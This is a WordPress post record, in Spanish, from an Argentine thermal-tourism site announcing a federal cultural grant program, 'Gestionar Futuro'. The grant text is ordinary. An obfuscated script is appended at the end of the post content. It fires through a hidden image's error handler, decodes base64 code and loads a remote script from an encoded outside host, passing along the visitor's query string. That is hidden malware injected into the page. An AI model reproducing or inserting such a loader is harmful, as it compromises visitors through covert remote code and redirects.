{"id":5421,"date":"2022-06-22T17:40:41","date_gmt":"2022-06-22T20:40:41","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5421"},"modified":"2025-08-13T16:18:17","modified_gmt":"2025-08-13T19:18:17","slug":"gestionar-futuro-fondos-federales-para-proyectos-culturales-asociativos","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5421","title":{"rendered":"Gestionar Futuro: fondos federales para proyectos culturales asociativos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"72\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-1024x72.jpeg\" alt=\"\" class=\"wp-image-5399\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-1024x72.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-300x21.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-768x54.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-696x49.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-1068x75.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_.jpeg 1187w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<h4 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\">Se abre la segunda convocatoria, que destinar\u00e1 una inversi\u00f3n de 100 millones de pesos que ser\u00e1 distribuida de forma federal: cada regi\u00f3n del pa\u00eds contar\u00e1 con un presupuesto preasignado y un Comit\u00e9 Evaluador propio para seleccionar los proyectos.<\/h4>\n\n\n\n<p>El programa Gestionar Futuro, del Ministerio de Cultura de la Naci\u00f3n, implementado a trav\u00e9s de la Secretar\u00eda de Gesti\u00f3n Cultural, que est\u00e1 dirigido a gestores y gestoras culturales y que brinda apoyo econ\u00f3mico a proyectos que&nbsp;<strong>fortalezcan el entramado cultural en cada regi\u00f3n del pa\u00eds<\/strong>, abrir\u00e1 una nueva convocatoria entre el 16 de junio y el 15 de julio, inclusive. Los fondos nacionales ser\u00e1n descentralizados y distribuidos de forma federal: cada regi\u00f3n cuenta con un presupuesto preasignado y con un Comit\u00e9 Evaluador propio para seleccionar los proyectos que se postulen. De este modo las regiones no compiten entre s\u00ed por los recursos, garantizando un acceso equitativo e incentivando proyectos que promuevan el desarrollo local.<\/p>\n\n\n\n<p>Esta segunda convocatoria cuenta con un presupuesto de&nbsp;<strong>100 millones de pesos<\/strong>&nbsp;distribuidos de la siguiente manera: 29% para la regi\u00f3n Buenos Aires (Provincia de Buenos Aires y CABA), 19% regi\u00f3n Centro (C\u00f3rdoba, Santa Fe y Entre R\u00edos), 16% regi\u00f3n NOA (Catamarca, La Rioja, Santiago del Estero, Tucum\u00e1n, Salta y Jujuy), 14% regi\u00f3n Cuyo (Mendoza, San Juan y San Luis), 12% regi\u00f3n NEA (Corrientes, Chaco, Formosa y Misiones) y 10% para la regi\u00f3n Patagonia (Neuqu\u00e9n, La Pampa, R\u00edo Negro, Chubut, Santa Cruz y Tierra del Fuego). Cada proyecto podr\u00e1 solicitar&nbsp;<strong>hasta $500.000<\/strong>&nbsp;y tendr\u00e1 que sumar apoyos de otras instituciones y organizaciones para ampliar su impacto social y territorial. Las iniciativas&nbsp;<strong>deber\u00e1n implementarse en la regi\u00f3n donde se presentan<\/strong>&nbsp;y podr\u00e1n encuadrarse en las siguientes l\u00edneas de trabajo:&nbsp;<strong>Producci\u00f3n, Formaci\u00f3n \/ Investigaci\u00f3n y\/o Cultura Digital<\/strong>.<\/p>\n\n\n\n<p>A trav\u00e9s de esta pol\u00edtica, el Ministerio de Cultura busca reconocer y potenciar la figura del&nbsp;<strong>gestor y la gestora cultural<\/strong>, en tanto sujeto pol\u00edtico que ejerce diferentes roles institucionales y territoriales, y posee las herramientas para el desarrollo de proyectos y programas culturales que se involucren y dialoguen con las comunidades. Los gestores y gestoras dise\u00f1an e implementan iniciativas que ampl\u00edan la ciudadan\u00eda cultural, siendo mediadores\/as entre creadores\/as, instituciones, comunidades art\u00edsticas, originarias, y nuevos p\u00fablicos. Esto constituye redes de trabajo en las que act\u00faan como verdaderos\/as facilitadores\/as, mediadores\/as y articuladores\/as de las pol\u00edticas p\u00fablicas. Se trata de un rol clave para la invenci\u00f3n, el desarrollo y la sostenibilidad de proyectos culturales en todo el pa\u00eds.<\/p>\n\n\n\n<p>Se les identifica de forma amplia: trabajadores\/as de la cultura, editores\/as, managers, representantes art\u00edsticos\/as, productores\/as, referentes\/as territoriales, integrantes de los colectivos LGTBIQ+, feministas, de las identidades afro, de pueblos y naciones ind\u00edgenas o de diferentes credos y todos\/as aquellos\/as que tengan un proyecto vinculado al \u00e1mbito cultural.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/whatsapp_image_2022-06-16_at_12.54.51_pm.jpeg\" alt=\"\" \/><\/figure>\n\n\n\n<p>La convocatoria se encuentra abierta, en las seis regiones del pa\u00eds,&nbsp;<strong>entre el 16 de junio y el 15 de julio inclusive<\/strong>. Las inscripciones se realizan a trav\u00e9s de&nbsp;<a href=\"https:\/\/www.cultura.gob.ar\/segunda-convocatoria-de-gestionar-futuro-2022-de-fondos-federales-para-11873\/\" target=\"_blank\" rel=\"noreferrer noopener\">este link de la Segunda convocatoria Gestionar Futuro 2022<\/a>.<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n o consultas escribir a:<br><a href=\"mailto:gestionarfuturo@cultura.gob.ar\" target=\"_blank\" rel=\"noreferrer noopener\">gestionarfuturo@cultura.gob.ar<\/a><\/p>\n\n\n\n\n\n<figure class=\"wp-block-image size-full is-style-rounded\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/gestionar-futuro-fondos-federales-para-proyectos-culturales-asociativos\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"684\" height=\"106\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_5-6-2022_172224_www.argentina.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-5422\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_5-6-2022_172224_www.argentina.gob_.ar_.jpeg 684w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_5-6-2022_172224_www.argentina.gob_.ar_-300x46.jpeg 300w\" sizes=\"(max-width: 684px) 100vw, 684px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se abre la segunda convocatoria, que destinar\u00e1 una inversi\u00f3n de 100 millones de pesos que ser\u00e1 distribuida de forma federal: cada regi\u00f3n del pa\u00eds contar\u00e1 con un presupuesto preasignado y un Comit\u00e9 Evaluador propio para seleccionar los proyectos. El programa Gestionar Futuro, del Ministerio de Cultura de la Naci\u00f3n, implementado a trav\u00e9s de la Secretar\u00eda [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5423,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-5421","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5421","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5421"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5421\/revisions"}],"predecessor-version":[{"id":10651,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5421\/revisions\/10651"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5423"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5421"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5421"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5421"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}